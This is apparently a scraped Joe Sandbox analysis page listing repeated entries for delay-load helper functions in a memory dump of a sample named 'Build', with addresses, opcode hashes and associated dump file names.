Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6e59a47208b05e803589fba7dbfb9cd06200f64c11161d1d0e64441824c244b0
Instruction ID: ccbee8f0cafffaed4275c64c2f65280f85aad966d1ac2d39aaa136e838e7c302
Opcode Fuzzy Hash: 6e59a47208b05e803589fba7dbfb9cd06200f64c11161d1d0e64441824c244b0
Instruction Fuzzy Hash: C7B012C23FC102EC320971DA9D12D3B01CCD4C1B10330C5FAF808C0140D8451C030031

Function 00B606C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ace6d385654576caf78861da268e6f8cfb007297df1f7c9467f0f305b9da291
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 4ace6d385654576caf78861da268e6f8cfb007297df1f7c9467f0f305b9da291
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B60782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b5ec9d80d246e02cc7e0098b15fe5de16f566880703ce0b47aa55cf1e73a47a
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 0b5ec9d80d246e02cc7e0098b15fe5de16f566880703ce0b47aa55cf1e73a47a
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B6073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ad7c633b8508e074250b66cb94d3177a8fd96ef283c03284ef29881dc21e3f53
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: ad7c633b8508e074250b66cb94d3177a8fd96ef283c03284ef29881dc21e3f53
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B60728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45080d3f2665abe596236831be8e0ae9594466c65c79c1b8b6efd66aae6aeab4
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 45080d3f2665abe596236831be8e0ae9594466c65c79c1b8b6efd66aae6aeab4
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B6070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bcd7ad32ef623381bf7c5638f7681946f160cc505c88fff14edb3b5f9a66084f
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: bcd7ad32ef623381bf7c5638f7681946f160cc505c88fff14edb3b5f9a66084f
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B60778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8da1ed659297f104f104c56e069e74f7c9fcdfc380f260b0bca26a96744fdd25
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 8da1ed659297f104f104c56e069e74f7c9fcdfc380f260b0bca26a96744fdd25
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B6076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3900a65ccf8b2523613089cd047391560819079c5120617ba0ca224842ae6828
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 3900a65ccf8b2523613089cd047391560819079c5120617ba0ca224842ae6828
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B60750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ee17ebb4048be68cda72f4037aa3cff98f0e4096b324db3736e73538435724d9
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: ee17ebb4048be68cda72f4037aa3cff98f0e4096b324db3736e73538435724d9
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B6075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ef71149ccfbd15f880f3321184e5467e2c5ddf6681b31a978273e23f1844040a
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: ef71149ccfbd15f880f3321184e5467e2c5ddf6681b31a978273e23f1844040a
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B60746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54776b7fa6e3630aabcb5349dfeec10cbbbf9f362a8aa885b94f2efffc359dd8
Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
Opcode Fuzzy Hash: 54776b7fa6e3630aabcb5349dfeec10cbbbf9f362a8aa885b94f2efffc359dd8
Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435

Function 00B608B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b75d841392964c5f6b9c862e786fd34ffc9007901b53d0cea690d1f1fbd3b852
Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
Opcode Fuzzy Hash: b75d841392964c5f6b9c862e786fd34ffc9007901b53d0cea690d1f1fbd3b852
Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075

Function 00B608BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 49ce0af5d90efd1f078c2ef5767002f2c487e7347e512882c5fcd0fe592f4b8b
Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
Opcode Fuzzy Hash: 49ce0af5d90efd1f078c2ef5767002f2c487e7347e512882c5fcd0fe592f4b8b
Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075

Function 00B6089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46c11023b63e0da472ff3baf8bdff227afe6614a6e77d4dfbc7589619c672632
Instruction ID: 72216731671456accfc43ffe9a7df53ee2bb8789b3cd8df723e5abe0a16436e6
Opcode Fuzzy Hash: 46c11023b63e0da472ff3baf8bdff227afe6614a6e77d4dfbc7589619c672632
Instruction Fuzzy Hash: D1A001962B9212BC350DB2AAAD46C3B22ACD5D1B65330CAFEF91DD5096A88828855075

Function 00B608F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8050fc8d32e9b207fc839731bf5fa7d7f441c27edeb9282aa96525c592e362f8
Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
Opcode Fuzzy Hash: 8050fc8d32e9b207fc839731bf5fa7d7f441c27edeb9282aa96525c592e362f8
Instruction Fuzzy Hash: E6A001962B9113BC350DB29AAD46C3B22ACD5D5BA5330CAEEF91AC5092A88828855075

Function 00B608E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ce6a2427cdb8d8d8cc6fd7f1f6deaccd22d3e14497a3656c927512f9a7dc2f7
Instruction ID: ce7b76fcb3ee7b4adcf386208599b70198b8a75bb59050459f05b47b5bbc1b46
